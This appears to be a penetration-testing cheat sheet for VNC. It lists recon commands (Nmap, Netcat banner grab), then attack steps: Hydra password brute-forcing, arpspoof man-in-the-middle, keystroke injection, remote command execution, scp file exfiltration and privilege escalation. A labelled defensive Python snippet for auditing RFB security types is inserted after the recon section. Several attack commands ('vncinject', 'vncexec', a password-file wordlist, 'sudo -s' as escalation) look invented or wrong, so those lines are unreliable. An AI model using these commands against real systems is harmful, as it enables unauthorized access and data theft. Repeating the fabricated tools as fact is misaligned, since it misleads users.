VNC (Virtual Network Computing)

Default Ports: 5900,5901

VNC (Virtual Network Computing) is a graphical desktop-sharing system that allows users to remotely control another computer's desktop over a network connection. It is widely used for remote administration, support, and screen sharing.

VNC operates on a client-server architecture, where the VNC server runs on the remote computer and the VNC client software is used to access and interact with the remote desktop.

Connect

Connect Using VNC Viewer

VNC Viewer is a popular client software used to connect to VNC servers:

vncviewer <target-ip>:<port>

Connect Using Remmina

Remmina is another remote desktop client that supports VNC connections:

remmina

Recon

Nmap Scan

You can use Nmap to scan for open VNC ports on a target host:

nmap -p 5900,5901 <target-ip>

Banner grabbing can be performed using tools like Netcat to identify VNC services and their versions:

nc -nv <target-ip> 5900
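
What that banner means when auditing your own servers, as an added Python example that is not part of the original page: it parses the RFB ProtocolVersion string and the security-type message defined in RFC 6143 and flags weak offerings. The names parse_server_hello and audit are hypothetical, and the sample bytes are constructed rather than captured from a real host.

```python
import re
import struct
from dataclasses import dataclass

# Security type codes: 1 and 2 are defined in RFC 6143, 18 and 19 in the IANA RFB registry.
NONE, VNC_AUTH, TLS, VENCRYPT = 1, 2, 18, 19

@dataclass
class ServerHello:
    version: tuple          # (major, minor), e.g. (3, 8)
    security_types: list    # numeric security types the server offers
    failure_reason: str = ""

def parse_server_hello(banner: bytes, security: bytes) -> ServerHello:
    """Parse the 12-byte ProtocolVersion banner and the security message after it."""
    m = re.fullmatch(rb"RFB (\d{3})\.(\d{3})\n", banner)
    if m is None or not security:
        raise ValueError("not an RFB server hello")
    version = (int(m.group(1)), int(m.group(2)))
    if version < (3, 7):
        # RFB 3.3: the server picks one type and sends it as a big-endian U32.
        if len(security) < 4:
            raise ValueError("truncated security message")
        (chosen,) = struct.unpack(">I", security[:4])
        types, rest = ([chosen] if chosen else []), security[4:]
    else:
        # RFB 3.7 and later: U8 count followed by that many U8 type codes.
        count = security[0]
        types, rest = list(security[1:1 + count]), security[1 + count:]
    reason = ""
    if not types and len(rest) >= 4:
        # No type offered: a U32 length and a reason string explain the refusal.
        (n,) = struct.unpack(">I", rest[:4])
        reason = rest[4:4 + n].decode("latin-1")
    return ServerHello(version, types, reason)

def audit(hello: ServerHello) -> list:
    """Return the findings a defender would raise for this server."""
    findings = []
    if NONE in hello.security_types:
        findings.append("offers security type None: no password required")
    if VNC_AUTH in hello.security_types:
        findings.append("offers VNC Authentication: password-only, session unencrypted")
    if hello.security_types and not {TLS, VENCRYPT} & set(hello.security_types):
        findings.append("no TLS/VeNCrypt type offered: tunnel over SSH or a VPN")
    return findings

# Constructed sample server hellos (assumptions, not real captures).
OPEN_SERVER = parse_server_hello(b"RFB 003.008\n", bytes([2, NONE, VNC_AUTH]))
HARDENED = parse_server_hello(b"RFB 003.008\n", bytes([1, VENCRYPT]))
```

The security-type message only arrives after the client has answered with its own ProtocolVersion line, so a bare Netcat connection shows the banner alone.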

Enumeration

Default Authentication

VNC servers often use default or weak credentials. Enumeration involves trying common username-password combinations:

vncviewer -passwd passwords.txt <target-ip>

Attack Vectors

Weak Authentication

Exploiting weak or default credentials is a common attack vector. Tools like Hydra can be used for brute-forcing VNC passwords:

hydra -V -f -L users.txt -P passwords.txt vnc://<target-ip>

Man-in-the-Middle (MITM) Attacks

MITM attacks can intercept VNC traffic and manipulate data exchanged between the client and server:

arpspoof -i <interface> -t <target-ip> <gateway-ip>

VNC Injection

Attackers can inject keystrokes and mouse movements into VNC sessions to gain control over the remote desktop:

vncinject <target-ip>

Post-Exploitation

Remote Code Execution (RCE)

Successful exploitation may lead to remote code execution, allowing attackers to execute arbitrary commands on the target system:

vncexec <target-ip> ls -la

Data Exfiltration

Attackers can exfiltrate sensitive data from the remote desktop:

scp user@<target-ip>:/path/to/file /local/path

Privilege Escalation

Exploiting vulnerabilities in the VNC server software or the underlying operating system can lead to privilege escalation:

sudo -s